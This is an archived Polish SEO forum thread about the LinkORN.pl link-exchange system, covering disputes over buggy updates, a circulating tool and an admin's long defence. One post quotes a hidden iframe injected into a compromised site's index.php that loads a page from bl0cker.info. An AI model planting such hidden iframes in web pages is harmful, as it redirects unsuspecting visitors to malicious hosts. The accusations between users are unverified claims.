Skocz do zawartości

LinkORN.pl


Paweł Kobis

Rekomendowane odpowiedzi

Adder z tego co widzialem to jest gdzies na tych darmowych downloaderach i rozsyłany jest link do downloadu - wiec ciezko bedzie znalezc kto pobierał - tzn użył bo pobranie to jeszcze nie dowod.

Ale pewno łatwo ustalisz kto umieścił i dobrze.

Tzn że :) kolega jeden zjawi się w Szczecinie powiadasz, to dobrze ;).

Odnośnik do komentarza
Udostępnij na innych stronach

  • Odpowiedzi 846
  • Dodano
  • Ostatniej odpowiedzi

a poczytaj na jego forum w kilku watkach jak ludzie nie wiedza dlaczego linkow nie maja, dlaczego sie strona wysypala, dlaczeg nowej instalacji nie widzi.

Bo to były poprawki ;) doskonałe a tak ogólnie to co on poprawiał skoro nic nie było :) a wszyscy tylko tak specjalnie pisali że coś jest.

Odnośnik do komentarza
Udostępnij na innych stronach

a poczytaj na jego forum w kilku watkach jak ludzie nie wiedza dlaczego linkow nie maja, dlaczego sie strona wysypala, dlaczeg nowej instalacji nie widzi.

Bo to były poprawki :) doskonałe a tak ogólnie to co on poprawiał skoro nic nie było :) a wszyscy tylko tak specjalnie pisali że coś jest.

Proszę zakoncż z tym, taką głupią wojna.

Mam szacunku do Ciebie, bo dużo ciekawe rzeczy napisałeś, ale PiO IMHO nie jest miejscią dla takiego rodzaju postach.

PS: Dużo krytykowałem dir-elite, ale w konkretnych sprawach, i taki gadanie IMHO nic nie daje....

Edit: sprobowałem troche gramatykizować ;)

Odnośnik do komentarza
Udostępnij na innych stronach

Nie odbieraj TTSEO tego jako wojowanie z nim - bo do wojny to musi być przeciwnik.

Są błedy to się o nich pisze, tzn że nie powinienem pisac o tym że dalej są błedy ? i zagrożenia bo to wojna.

Zauważ że nie ja napisałem o tym że ktoś coś tam dodaje do poprawek jako rozumiem element promocji.

Więc skoro ktos wkleja newsa by się tym pochwalić że to taka rewelacja bo ktos daje soft do poprawek to poprostu czysto naturalnie ciężko tego nie komentować - i niema to raczej nic wspólnego z wojowaniem.

O tyle masz racje :) szkoda nawet komentowac i przekonywac userów że sami sobie szkodzą bo pewnej grupy ludzi się nie uświadomi o tyle gdy czytam o tym jak to jest w LINKORN fajna promocja bo do poprawek ktoś coś daje to nie można zostawić tego bez komentarza.

Odnośnik do komentarza
Udostępnij na innych stronach

Chodziło o program dzięki któremu można nadzorować Linkorna. Był wcześniej tylko na forum, teraz jest w paczce z instalatorem.

I raczej nie ma związku z poprawkami, po prostu zostało dorzucone do paczki.

"Aplikacja-PC" w tym katalogu znajduje sie aplikacja umozliwiajaca bezposrednio z poziomu waszego komputera zarzadzanie

swoim kontem w systemie bez koniecznosci logowania sie na stronie www.

Sama instalacja jest bardzo prosta i ogranicza sie do zainstalowania jej na PC i podania w zakladce ustawienia

swojego loginu i hasla do systemu LinkORN.pl i nacisnieciu "zapisz dane"

Ostatni post na blogu - Po co Ci katalog stron?

if.pl

Odnośnik do komentarza
Udostępnij na innych stronach

O tyle masz racje smile.gif szkoda nawet komentowac i przekonywac userów że sami sobie szkodzą bo pewnej grupy ludzi się nie uświadomi o tyle gdy czytam o tym jak to jest w LINKORN fajna promocja bo do poprawek ktoś coś daje to nie można zostawić tego bez komentarza.

sorki ale nie złapałem - źle że są robione poprawki bo nie łapie, jesli sa robione to dobrze wg mnie

fakt jest jeden ze dz tobie szook admini systemów zaczeli bardziej zwracac uwage na swoje dziela (tak mi sie wydaje przynajmniej) tak wiec moze za jakis czas beda takie jakie bysmy chcieli aby były

kolejna rzecz o jakim adderze jest mowa - linkorn daje jakis program kogos innego autorstwa ???? jesli daje to linkorn to gdzie bo tego nie widze - i nie zebym chcial sciagnąc sobie od razu :)

Oferuje miejsce na kilku stronach internetowym, gdzie możesz umieścić:
BANERY REKLAMOWE
ARTYKUŁY PROMOCYJNE, REKLAMOWE, INFORMACYJNE

Odnośnik do komentarza
Udostępnij na innych stronach

właśnie bardzo dobrze że są sstorrm robione poprawki.

Ja tylko pozwalam sobie zauwazyc ze dokonane poprawki/ naprawa buga nie były skuteczne i userzy wrocili do wersji z błedami i nowy instalator dalej zawiera pewne błedy co powoduje brak poprawnej instalacji badz linki nie wyswietlaja sie przez co userzy posiadaja wirtualne linki - nie faktyczne.

Co do programu, programik exe był dawany wczesniej już do instalki jeszcze przed poprawkami więc zapewne nie o ten programik chodziło.

Sttorm a gdzies krązy link po sieci do czegos a nawet dostałem na pw, przy okazji zostala obdarowana czesc users nie zwiazana z systemem.

Odnośnik do komentarza
Udostępnij na innych stronach

Adder 4

https://www.forum.optymalizacja.com/index.php?showtopic=31233 - post Giela

Działa bo znam kilka osób, które instalowały już go. Sam używam kopi z licencją - aby nie było.

Robię barcampy: Aula Polska i RadomIT i kilka innych.

Czy wiesz, że największe prowizje w branży turystycznej i masę narzędzi daje Odpoczne.pl (bez ref'a)?

Odnośnik do komentarza
Udostępnij na innych stronach

Informuje uzytkowników systemu, że nie tak dawno publicznie opusciłem linkorna.

Zostałem za to surowo ukarany.

Dziś wróciłem do kraju, do domu, do internetu po 3 dniach nieobecnosci i zobaczyłem,

że wszystkie moje stronki które miełi coś wspólnego z linkornem zostały calkowicie uszkodzone.

Zanotowałem 3 sposoby uszkodzenia plików:

1 całkowite kasowanie ich tresci

2 czesciowe kasowanie ich tresci i mieszanie z trescią sasiednej strony z serwera

3 czesciowe kasowanie ich tresci i mieszanie z trescią strony z sasiedniego serwera.

Wszedzie wystepuje przekierowanie na strone bl0cker.info.

Kod index.php (kawałek:)

<iframe src='https://bl0cker.info/st/go.php?sid=3' width=1 height=1 style='visibility: hidden;'></iframe>

I teraz mam pytanie, kto by to mógl zrobic?

Kod linkorna na stronach niby skasowałEm, ale mogłem przegapisć gdzieś, dużo tego było.

Odnośnik do komentarza
Udostępnij na innych stronach

ps. wazna rzecz prosze nie klikac w link PAWKA gdyz to jest trojan - wlasnie zainfekowaly nam sie komputery,

aby wyjasnic post PAWKA - widze ze strony zostaly usuniete dzisiaj 12.05.2007

mowiles o tym dawno ale widze ze bany poszly dzisiaj dopiero i to jest twoja decyzja nie bede sie z nia spieral,

zostales ukarany odjeciem punktów co jest zgodne z naszymi zasadami - odjeciem punktów za strone - ktos zaplacil za linki u ciebie.

odnosnie uszkodzenia twoich stron - nie wiem co masz na mysli ale odbieram to jako kolejny atak na nasz system i w sumie nie interesuje mnie to, gdyz nie jest to pierwsze zachowanie pewnych osob i szkoda mi tylko ze dołączasz do nich, gdyz myslałem że jestes inna osobą, ale widocznie sie myliłem,

tak naprawde z tego ci widze nie wazne co człowiek robi to i tak to bedzie złe wiec nic na to nie moge poradzić, czekam tylko az pod opstrzałem znajdzie sie za chwile inny system, ale to nie moj problem ja mam zamiar robic dalej to co robie czyli pracowac dla osob ktore chca byc lepsze od innych

ps. wazna rzecz prosze nie klikac w link PAWKA gdyz to jest trojan - wlasnie zainfekowaly nam sie komputery

za chwile dokoncze moja wypowiedz.

DALSZA CZESC WYPOWIEDZI:

ja odbieram na kolejna probe pomowienia naszego systemu i zdeskrytowania nas bezpodstawnego ale coz nic na to nie poradze choc nei wiem co czlowiek by robil i tak bedzie zle,

nie mam pojecia kto ci sie wlamal na serwery ale nei bylo to dzialanie z naszej strony i nie sadze ze przez nasz skrypt - jesli go usunołes to niby jak ??? ale napewno padnie ze to nasza winna i juz sie do tego przyzwyczailem ale to sprawa osob oceniajacych to co sie tutaj dzieje i tych co nas obrazaja - wyzywaja od zuli i innych takich osob - jak jestescie tacy inteligetni to zrobcie cos wlasnego - zobaczycie jak to jest łatwo i przyjemnie odpierac ciagle zarzuty osob ktore nic nie daja a chce wszystko meic dla siebie :);)

dosyc tez mamy juz prob włamu na nasze serwery, widocznei bardzo nas pewne osoby nie lubia ale nie wiem dlaczego, gdyz miejsca jest duzo w sieci i nie jeden system sie utrzyma ale widac ze komus nasze osoby nie odpowiadaja - nic na to nie poradzimy ale przykro nam z tego powodu - mamy swoje podejrzenia dlaczego ale nic zostawie je dla siebie

szook - miaj tydzien od zadymy a nie widze oceny innych systemów czyżby skonczyly sie testy i bylo wszystko w porzadku - jesli tak to sie bardzo ciesze z tego powodu, gdyz inni byli w pewnym momencie lepsi od nas, ale poprawki naszym zdaniem wyeliminowaly pewne bledy choc nie sadze ze wszystkie (błedy dotyczyly ustawien pewnej ilosci serwerów nie wszytskich aby odrazu sprostwoac jakas ostra riposte)

bledy moga byc wszedzie dobrze by bylo aby jesli ktos je widzi nas o tym grzecznie informowal a nie wszczynal zadymy - na szczescie inni uzytkownicy systemu gdy widza bledy lub jakies nieprawidlowosci nas o tym informuja i na biezaco je poprawiamy (czyni tak wiekszosc adminów systemów - na szczescie swoich uzytkowników)

Nie ma bowiem systemu bez błedów. Tylko nie każdym może się do tego przyznać, my tez w sumie, ale ma tak kazdy tworca - gdyz zawsze kazdy uwaza ze jego dzielo jest idealne - ale my staramy sie neizlocznie poprawiac to co sie nie podoba innym i jesli ma swoja wartosc dokonujemy zmian aby system lepiej dzialal i byl bardziej funkcjonalny

Kazdy decyduje co i jak chce - wazna jest skutecznosc danego systemu i to co daje swoim uzytkownikom i dlatego dziekuje wszystkim którzy nas wspieraja i pomagaja nam w tej ciezkiej pracy i wspomagaja rozwijanie tego co tak cieżką pracą zrobiliśmy

LINKORN sie ciagle rozwija wprowadza pewne usprawnienia i nie tylko

jesli ktos twierdzi ze ktos z linkorn rozpowszechnia nielegalne oprogramowanie prosze pokazac dowody na takie dzialanie zostana wyciagniete konsekwencje wobec takiego admina jesli to robi, a informacje na ten temat w temacie LINKORN na tym szczytnym forum traktuje jako jawne pomówienie i dezinformowanie innych osob czytajacych ten temat i ja sobie tego nie życze tak jak napewno nie zyczy sobie żadna inna osoba która mogła by być w ten sposob pomówiona

pozdrawiam

Pytania odnośnie systemu LINKORNproszę zadawać na tym forum : https://www.support.linkorn.pl

Na PIO proszę nie pisać na PRIV. Proszę pisać na naszym forum.

Odnośnik do komentarza
Udostępnij na innych stronach

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.

×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności